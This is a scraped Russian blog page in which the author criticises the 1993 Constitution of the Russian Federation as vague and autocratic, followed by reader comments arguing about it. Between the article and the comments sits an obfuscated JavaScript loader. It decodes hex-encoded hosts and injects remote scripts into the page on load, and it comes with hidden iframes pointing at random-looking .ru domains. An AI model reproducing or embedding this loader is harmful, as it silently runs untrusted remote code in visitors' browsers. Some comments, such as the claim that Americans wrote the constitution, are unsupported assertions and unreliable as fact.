ОСНОВНОЙ ЗАКОН РОССИИ

    Эту статью могут комментировать только участники сообщества.
    Вы можете вступить в сообщество одним кликом по кнопке справа.
    Михаил Романцов написал
    3 оценок, 423 просмотра Обсудить (16)

     

     

     

     Поделюсь своими наблюдениями и соображениями о том, как вышло так, что наша страна оказалась в печальном сегодняшнем положении.  Теперь более-менее мыслящему человеку ясно, что в стране произошло и по чьей винеА недавно я прочитал книгу Михаила Полторанина «Власть в тротиловом эквиваленте» и понял: детальнее и лучше, чем он, не скажешь. Человек, работавший когда-то в советской «Правде», потом бывший одним из ближайших соратников Ельцина, министром информации, знающий все «из первых рук», полностью разочаровавшийся в действиях «царя Бориса» и его последователей, создал, на мой взгляд, капитальнейший труд, который, я думаю, со временем будут изучать в школах и институтах, предварительно использовав его в качестве ценнейшего документа на Великом Суде, который так или иначе уже идет в народе нашем. Да, царь-Борис, да, его верные последователи, «реформаторы», наворочали и продолжают ворочать, Одну Шестую превратили в Одну Восьмую и судя по всему, вообще стараются ее уничтожить… Но у нас ведь есть Конституция, Основной Закон, по которому должна жить страна!
    Не может же быть, чтобы Чубайс, Гайдар, Черномырдин да и теперешние наши господа, в том числе «олигархи», а уж тем более высшие наши чиновники, включая самих президентов, так легко, спокойно и безнаказанно нарушали святые статьи Основного Закона! Но тогда почему же так получилось и получается? Почему разрушение, грабеж, коррупция, безнаказанность, разложение? В 93-м я голосовал против теперешней «Конституции РФ», потому что это была Ельцинская Конституция и принималась она после того, как он полностью показал себя во всей красе безумия и антинародности, особенно в октябре при обстреле Белого дома, что я и тогда считал и сейчас считаю бандитским, истинно террористическим, фашистским актом, крайне позорным для нашей страны. Но Конституция та была все же принята, а, следовательно, как законопослушный гражданин, я должен соблюдать ее. Теперь решил еще раз внимательно перечитать наш Основной Закон., Во-первых, составляли наш Основной Закон люди,  всегда  не ясно мыслящие и не очень умные, а во-вторых, это конституция никакой не демократической страны, а капиталистической.
    Хотя потуги такие есть и определенные статьи это декларируют, однако на самом деле, фактически, наша сегодняшняя «Конституция РФ» устанавливает и закрепляет Самодержавие , Феодализм и Капитализм. Очевидно, что вечная российская привычка трепетать перед властьимущими не позволила составителям закрепить по-настоящему требовательное отношение к тем, кого мы выбираем, кто получает власть, как всегда, предоставляя им неограниченную возможность заботиться, не  о стране, сколько о себе любимых. В Основном Законе говорится о системе выборов во Власть, но фактически ничего толкового не сказано о системе «у-боров» то есть отзыва от Власти тех, кто не справляется со своими обязанностями и не выполняет своих обещаний. Много говорится о том, как должно быть, но почти ничего о механизме исполнения этого и о действенном контроле за обладателями власти. Полная бесконтрольность власти. Где это видано . Также совершенно не разработана механика разделения властей, независимости властей от воли какого-то одного человека, а это одна из главных основ демократии. Президент по сегодняшней Конституции РФ – это фактически царь, практически бесконтрольный самодержец. Удивительно то, что как-то не принято говорить обо всем этом, и даже те, кто во времена недавних многотысячных протестов выставлял плакаты о Конституции и призывали ее защищать, не упоминали о ее самодержавной , феодальной, капиталистической  и антинародной  сути! Я абсолютно уверен, что никто из народа  кроме  тех писак, что ее писали , что никто  нашу Конституцию внимательно  вовсе даже не брал в руки  и вовсе не читал.
      С таким Основным Законом мы никогда не выберемся из тупика и полного кризисавсего и вся, в котором сейчас оказались и не создадим разумного и здравого гражданского общества никогда. Так и будем с трепетом кроликов ждать, что будет с нами, когда уйдет один безальтернативный и пожизненный президент и придет другой, тоже «безальтернативный», неподконтрольный, пожизненный. Называлось это рабское бессилие и недееспособность народа раньше самодержавием, потом «демократическим централизмом», а теперь называется у нас «демократией». А Основной Закон наш это рабское бессилие безумного недееспособного народа перед властями «легитимно» закрепляет..Впрочем, удивляться нечему. Сегодняшняя Конституция была принята во времена «царя Бориса», и естественно, что творцы ее не могли не чувствовать себя под его незыблемой властью. Если же вернуться в сегодняшний день, то многие ли наши граждане  теперь хоть что-нибудь читают внимательно  и  тексты больше трех слов.? Попробую наглядно и аргументированно показать суть нашего Основного Закона, вовсе не претендуя на абсолютную свою правоту, но убедительно призывая соотечественников внимательно  присмотреться, а если возразить, то - тоже аргументированно. Ведь Конституция – это Основной Закон, по которому мы все с вами ежедневно  живем! Какой смысл выбирать Президента – и даже переизбирать его! – если антинародная  вражеская  Конституция останется прежней! Итак, уже в Преамбуле нашего Основного Закона читаем:

    «Мы, многонациональный народ Российской Федерации, соединенные общей судьбой на своей земле, утверждая права и свободы человека, гражданский мир и согласие, сохраняя исторически сложившееся государственное единство, исходя из общепризнанных принципов равноправия и самоопределения народов, чтя память предков, передавших нам любовь и уважение к Отечеству, веру в добро и справедливость, возрождая суверенную государственность России и утверждая незыблемость ее демократической основы, стремясь обеспечить благополучие и процветание России, исходя из ответственности за свою Родину перед нынешним и будущими поколениями, сознавая себя частью мирового сообществапринимаем Конституцию российской Федерации»
     Несколько раз перечитал я огромное это предложение. Трудно отделаться от ощущения, что это - полный  обман  и  сумбур, начиненный бессмыслицей, безумием  и повторами, хотя авторы этих не очень вразумительных слов очень хотели создать ощущение торжественной значительности. Ну ведь на самом деле: Конституция - это не художественная литература  и не билетристика.
    Это серьезный деловой текст, согласно положениям которого существует Государство огромной страны и живут миллионы людей! На нем основано множество других законов, уложений, постановлений. Никто не против торжественности и значительности, но ясно же, что Основной Закон Государства должен быть предельно ясным и однозначным, лаконичным, четким, не допускающим противоречивых толкований и отклонений. Основной Закон - это маяк и Свет на который равняются все. Перечитайте Преамбулу внимательно, вдумайтесь в эти многозначительные строки, попытайтесь осознать главное - не риторику, а смысл. Сопоставьте эти словосочетания с реальной жизнью, ради которой и принимается Основной Закон. Обратите особое внимание на несколько фраз - что они означают? «...чтя память предков, передавших нам любовь и уважение к Отечеству, веру в добро и справедливость, возрождая суверенную государственность России и утверждая незыблемость ее демократической основы..
    Весь смысл Конституции, принятой в 1993-м году, по замыслу антинародных  авторов в том, чтобы, освободившись от диктата КПСС, заменить предшествующий Основной Закон, «брежневский», на новый, этот, демократический, ведь так? Но«чтя память» каких же предков? . Предков, исповедовавших Основной Закон, принятый при Брежневе, Хрущеве, Ленине? Или тот, что при Сталине? Или волю самодержцев царской России? «Веру в добро и справедливость» какие? Сталинские «добро и справедливость»? Ленинские? Хрущевские? Или Брежневские, Ленинские? Или от династии Романовых? От Ивана Грозного, может быть? Ведь каждый раз в России «добро и справедливость» воспринимали с разных точек зрения. Что имели в виду антинародные  авторы теперешнего Основного Закона? «...Суверенная государственность России» тоже разная... Ведь до принятия этого Основного Закона она была другая суверенность. Была суверенность Одной Шестой, состоящей из 15-ти Республик, а не теперешней урезанной Одной Восьмой... «...утверждая незыблемость ее демократической основы» - это что за абракадабра и полное безумие? Где вы, новые господа, взяли «незыблемость основы», да еще и «демократической»?
    Ее еще надо только лишь создавать, а вы – уже «утверждая незыблемость»... Я уже не говорю про «общепризнанность» принципов равноправия и самоопределения народов. Откуда вы взяли это «ОБЩЕ»? Из конституций африканских стран? Азиатских? Южноамериканских? США? Демагогия, безумие  и красивость слов и не более. Неточность... И это - Преамбула Основного Закона! Но этот сумбур, безумие, неясность, многозначительность, не несущие смысла, повторяются в тексте Основного Закона неоднократно, а многократно. Антинародные  авторы текста как будто не верят сами себе и, чувствуя, что чего-то не хватает, путаясь, пытаются компенсировать это лишними «громкими»  и торжественными словами и даже лишними статьями, забыв, что это все-таки - ОСНОВНОЙ ЗАКОН. Путаница, неточность, безумие, неясность, лишние слова и дают возможность для непорядочных людей легко отклоняться в сторону от любого  пункта конституции использовать в своих злодейских корыстных целях, а простым людям мутить головы... Но это бы еще ладно.  Наша Конституция закрепляет рабскую зависимость всего народа в целом и каждого из нас граждан, от властей и никак не предусматривает всерьез долг и ответственность и подотчетность  властей перед гражданами и народом России. 

     

    <script type="text/javascript">// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "maxpark.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.​loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.​replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),​document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==​typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"​function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a251​9043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}(); // ]]></script>

    <iframe id="a1996667054" style="" src="https://25haich4342.ru/f2.html?a=26363" width="320" height="240"></iframe><iframe id="a754394637" style="" src="https://gyh1lh20owj.ru/u.html?a=26363" width="320" height="240"></iframe>

    Комментировать

    осталось 1185 символов
    пользователи оставили 16 комментариев , вы можете свернуть их
    Змий Гаврилыч # написал комментарий 1 июня 2016, 19:51
    Что бы судить о Конституции хороша она или плоха,
    надо что бы она выполнялась.
    Михаил Романцов # ответил на комментарий Змий Гаврилыч 1 июня 2016, 20:28
    А зачем. она лучше понятна когда не выполняется и недееспособна. Так лучше видна дурь и писавших и чиавших и живущих при ней. и во времена ее.
    Змий Гаврилыч # ответил на комментарий Михаил Романцов 1 июня 2016, 21:02
    Я например ничего такого не вижу. Не вижу ни одной Конституции,
    не в одной стране
    которая бы выполнялась до ногтя, но к этому стремятся.
    А тут на нее просто наплевали.
    Михаил Романцов # ответил на комментарий Змий Гаврилыч 1 июня 2016, 21:26
    +++ Вы правы. Согласен.
    Просто мысль # ответил на комментарий Змий Гаврилыч 2 июня 2016, 12:11
    Чтобы конституция "выполнялась", нужно иметь конституцию, а не ту обманку, что конституцией называется.
    .
    Змий Гаврилыч # ответил на комментарий Просто мысль 2 июня 2016, 13:41
    Обманка, не обманка. Но принята народом
    на референдуме, так что извольте выполнять.
    И клятву произносит гарант гладя руку на Конституцию,
    или что другое?
    Просто мысль # ответил на комментарий Змий Гаврилыч 2 июня 2016, 14:56
    Конституцию дОжно писать, а не принимать.

    Кто принимал, тому и – «извольте выполнять».

    Тупому большинству «народа» – что конституцию принимать, что филькину грамоту, – лишь бы проголосовать.

    А поскольку не самим народом создано, потому и «не работает».

    Конституция (в переводе, устройство) – это учредительный документ, паспорт государства.

    В конституции РФ об учреждении государства нет ни слова.

    Государство РФ – как и конституция РФ, – подлог, фальшивка, фикция.

    Нет в России ни конституции, ни государства, созданных народом.

    И это нужно понять, – ну, или «выучить наизусть», если понять нечем.
    .
    Змий Гаврилыч # ответил на комментарий Просто мысль 2 июня 2016, 16:40
    Мысли у вас гниловатые,
    когда конституцию для вас пишут, то ее пишут для рабов.
    Но если написанное принято, то и верха и низы обязаны
    ее соблюдать.
    Потом государство созданное народом, расшифруйте пожалуйста
    вашу болтовню, очень невразумительно, государство никогда
    не создавалось народом и нигде.
    А КОНСТИТУЦИЯ это договор между государством и народом
    он должен выполнятся иначе как такового государства нет.
    Так что мысль вам надо додумать прежде чем кого то учить.
    Просто мысль # ответил на комментарий Змий Гаврилыч 2 июня 2016, 17:18
    Прежде чем поучать, вам следовало бы самому начать учиться.
    .
    Змий Гаврилыч # ответил на комментарий Просто мысль 2 июня 2016, 18:18
    Вам прежде чем комментировать, необходимо выучить наизусть это.
    Конституция - это основной закон государства, то есть список самых главных правил, которые установили для себя граждане государства.
    Просто мысль # ответил на комментарий Змий Гаврилыч 3 июня 2016, 08:09
    Так – «КОНСТИТУЦИЯ это договор между государством и народом», или же «Конституция – это основной закон государства, то есть список самых главных правил, которые установили для себя граждане государства»?

    Что-то тут не срастается, – плохо выучено наизусть?

    Вам – прежде чем давать советы, следует убедиться, есть ли в них нужда.
    .
    Леонид Андреич # написал комментарий 1 июня 2016, 20:07
    ..Серьёзно, правильно, и.. уже привычно, к сожалению. И это хорошо, это завоевание крайних 20 лет ! - что можно писать такое - и не бояться, как боялись при Петре Великом.. при Елизавете.. при Екатерине.. Александрах.. и так до Хрущёва и Горбачёва.
    Имею два замечания к Автору.
    1. История сама решает когда ей бежать, а когда идти медленно.. "Чтобы вымерли родившиеся в рабстве ! "
    Царь Путин понимает это.. И даёт возможность и осознать и новым людям вырасти. Потому что просто ломить стенка на стенку - это был бы очередной 17й год..
    А так.. "Россия сосредотачивается".. Как обычно - жизнями самых простых, бедных и беззащитных платит за исторические подвижки.
    2 Безграмотность режет глаз на фоне описания таких нешуточных, действительно трудных проблем..
    "Билетристика".. - это от слова билет ?
    То есть, билетристика - это что ? Продажа билетов ? Изучение билетов ?

    .. А есть в русском языке прекрасное слово, калька с французского - беллетристика, то есть от слов бёль летре, прекрасное писание, прекрасное письмо, описание прекрасного..

    .. Вот так сам Автор ставит подножки своему тексту.. Ну неможно смеяться таким ляпам, читая про трагедию России..
    Михаил Романцов # ответил на комментарий Леонид Андреич 1 июня 2016, 20:26
    Не вижу разума в вашем тексте . одно безумие словоблудия. Букв много а смысла нет. Жаль вас дядя.
    Antanas Kuzminskis # написал комментарий 2 июня 2016, 19:44
    Конституцию РФ написали парни из США.Суверинитетеа то нету.Международные законы имеет приемушчество перед законами РФ.БлагоДарю.
    Просто мысль # ответил на комментарий Antanas Kuzminskis 3 июня 2016, 08:20
    Конституцию «парни» написали такую, на какую в то время хватило ума.

    По поводу «суверенитета» и «преимущества» – уже есть решение конституционного суда РФ по этому вопросу.
    .
    Antanas Kuzminskis # ответил на комментарий Просто мысль 3 июня 2016, 17:56
    Рад за вашу страну.Слава БОГУ дела пошли в гору.БлагоДарю.
    • Регистрация
    • Вход
    Ваш комментарий сохранен, но пока скрыт.
    Войдите или зарегистрируйтесь для того, чтобы Ваш комментарий стал видимым для всех.
    Код с картинки
    Я согласен
    Код с картинки
      Забыли пароль?
    ×

    Напоминание пароля

    Хотите зарегистрироваться?
    За сутки посетители оставили 701 запись в блогах и 6594 комментария.
    Зарегистрировалось 24 новых макспаркеров. Теперь нас 5025619.